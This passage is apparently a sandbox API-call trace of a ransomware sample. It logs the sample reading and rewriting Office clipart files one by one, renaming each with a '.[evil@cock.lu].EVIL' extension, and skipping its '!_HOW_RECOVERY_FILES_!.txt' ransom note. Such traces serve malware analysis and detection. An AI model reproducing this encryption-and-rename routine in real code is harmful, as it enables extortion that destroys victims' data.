dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.136] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x911a, lpOverlapped=0x0) returned 1 [0155.164] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.164] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.164] _errno () returned 0x84b1160840 [0155.164] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.164] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x9120, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9120, lpOverlapped=0x0) returned 1 [0155.164] CloseHandle (hObject=0x1a8) returned 1 [0155.164] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313896.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.165] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.165] __uncaught_exception () returned 0x84b1160800 [0155.165] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.165] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313896.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313896.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313896.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313896.jpg.[evil@cock.lu].evil")) returned 1 [0155.166] ??_V@YAXPEAX@Z () returned 0x1 [0155.170] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313896.JPG", dwFileAttributes=0x200) returned 0 [0155.170] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.170] wcsstr (_Str="J0313965.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.170] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313965.JPG") returned 69 [0155.170] wcscmp (_String1="J0313965.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.170] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0313965.JPG") returned 0x0 [0155.170] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313965.JPG") returned 0x45 [0155.170] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313965.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313965.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.173] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa75a, lpOverlapped=0x0) returned 1 [0155.181] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.181] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.181] _errno () returned 0x84b1160840 [0155.181] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.181] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0xa760, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa760, lpOverlapped=0x0) returned 1 [0155.182] CloseHandle (hObject=0x1a8) returned 1 [0155.182] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313965.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.182] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.182] __uncaught_exception () returned 0x84b1160800 [0155.182] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.183] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313965.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313965.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313965.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313965.jpg.[evil@cock.lu].evil")) returned 1 [0155.184] ??_V@YAXPEAX@Z () returned 0x1 [0155.187] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313965.JPG", dwFileAttributes=0x200) returned 0 [0155.187] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.188] wcsstr (_Str="J0313970.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.188] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313970.JPG") returned 69 [0155.188] wcscmp (_String1="J0313970.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.188] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0313970.JPG") returned 0x0 [0155.188] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313970.JPG") returned 0x45 [0155.188] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313970.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313970.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.190] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x81ab, lpOverlapped=0x0) returned 1 [0155.199] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.199] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.199] _errno () returned 0x84b1160840 [0155.199] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.199] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x81c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x81c0, lpOverlapped=0x0) returned 1 [0155.199] CloseHandle (hObject=0x1a8) returned 1 [0155.199] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313970.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.200] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.200] __uncaught_exception () returned 0x84b1160800 [0155.200] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.200] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313970.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313970.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313970.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313970.jpg.[evil@cock.lu].evil")) returned 1 [0155.201] ??_V@YAXPEAX@Z () returned 0x1 [0155.205] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313970.JPG", dwFileAttributes=0x200) returned 0 [0155.205] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.205] wcsstr (_Str="J0313974.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.205] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313974.JPG") returned 69 [0155.205] wcscmp (_String1="J0313974.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.205] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0313974.JPG") returned 0x0 [0155.205] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313974.JPG") returned 0x45 [0155.205] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313974.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313974.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.207] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb9d1, lpOverlapped=0x0) returned 1 [0155.216] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.216] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.216] _errno () returned 0x84b1160840 [0155.216] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.216] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xb9e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb9e0, lpOverlapped=0x0) returned 1 [0155.216] CloseHandle (hObject=0x1a8) returned 1 [0155.216] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313974.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.217] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.217] __uncaught_exception () returned 0x84b1160800 [0155.217] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.217] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313974.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313974.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313974.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313974.jpg.[evil@cock.lu].evil")) returned 1 [0155.218] ??_V@YAXPEAX@Z () returned 0x1 [0155.221] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313974.JPG", dwFileAttributes=0x200) returned 0 [0155.221] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.221] wcsstr (_Str="J0314068.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.221] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0314068.JPG") returned 69 [0155.221] wcscmp (_String1="J0314068.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.221] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0314068.JPG") returned 0x0 [0155.221] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0314068.JPG") returned 0x45 [0155.221] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0314068.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0314068.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.223] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x40f2, lpOverlapped=0x0) returned 1 [0155.230] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.230] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.230] _errno () returned 0x84b1160840 [0155.230] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.230] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x4100, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4100, lpOverlapped=0x0) returned 1 [0155.230] CloseHandle (hObject=0x1a8) returned 1 [0155.230] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0314068.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.230] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.230] __uncaught_exception () returned 0x84b1160800 [0155.230] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.231] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0314068.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0314068.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0314068.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0314068.jpg.[evil@cock.lu].evil")) returned 1 [0155.231] ??_V@YAXPEAX@Z () returned 0x1 [0155.234] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0314068.JPG", dwFileAttributes=0x200) returned 0 [0155.235] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.235] wcsstr (_Str="J0315580.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.235] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315580.JPG") returned 69 [0155.235] wcscmp (_String1="J0315580.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.235] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0315580.JPG") returned 0x0 [0155.235] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315580.JPG") returned 0x45 [0155.235] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315580.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0315580.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.236] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4b02, lpOverlapped=0x0) returned 1 [0155.243] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.243] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.243] _errno () returned 0x84b1160840 [0155.243] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.243] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x4b20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4b20, lpOverlapped=0x0) returned 1 [0155.244] CloseHandle (hObject=0x1a8) returned 1 [0155.244] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315580.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.244] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.244] __uncaught_exception () returned 0x84b1160800 [0155.244] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.244] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315580.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0315580.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315580.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0315580.jpg.[evil@cock.lu].evil")) returned 1 [0155.245] ??_V@YAXPEAX@Z () returned 0x1 [0155.249] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315580.JPG", dwFileAttributes=0x200) returned 0 [0155.249] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.249] wcsstr (_Str="J0315612.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.249] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315612.JPG") returned 69 [0155.249] wcscmp (_String1="J0315612.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.249] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0315612.JPG") returned 0x0 [0155.249] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315612.JPG") returned 0x45 [0155.249] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315612.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0315612.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.252] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x423a, lpOverlapped=0x0) returned 1 [0155.264] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.264] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.264] _errno () returned 0x84b1160840 [0155.264] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.264] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x4240, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4240, lpOverlapped=0x0) returned 1 [0155.265] CloseHandle (hObject=0x1a8) returned 1 [0155.265] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315612.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.265] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.265] __uncaught_exception () returned 0x84b1160800 [0155.265] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.266] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315612.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0315612.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315612.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0315612.jpg.[evil@cock.lu].evil")) returned 1 [0155.267] ??_V@YAXPEAX@Z () returned 0x1 [0155.270] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315612.JPG", dwFileAttributes=0x200) returned 0 [0155.270] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.270] wcsstr (_Str="J0318448.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.270] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318448.WMF") returned 69 [0155.270] wcscmp (_String1="J0318448.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.270] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0318448.WMF") returned 0x0 [0155.270] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318448.WMF") returned 0x45 [0155.271] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318448.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0318448.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.285] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4180, lpOverlapped=0x0) returned 1 [0155.294] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.294] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.294] _errno () returned 0x84b1160840 [0155.294] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.294] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x41a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x41a0, lpOverlapped=0x0) returned 1 [0155.294] CloseHandle (hObject=0x1a8) returned 1 [0155.294] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318448.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0155.295] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0155.295] __uncaught_exception () returned 0x84b1160800 [0155.295] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0155.295] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318448.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0318448.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318448.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0318448.wmf.[evil@cock.lu].evil")) returned 1 [0155.296] ??_V@YAXPEAX@Z () returned 0x1 [0155.300] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318448.WMF", dwFileAttributes=0x200) returned 0 [0155.300] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0155.300] wcsstr (_Str="J0318804.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0155.300] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318804.WMF") returned 69 [0155.300] wcscmp (_String1="J0318804.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0155.300] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0318804.WMF") returned 0x0 [0155.300] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318804.WMF") returned 0x45 [0155.300] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318804.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0318804.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.303] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2dfa, lpOverlapped=0x0) returned 1 [0155.311] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.311] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0155.311] _errno () returned 0x84b1160840 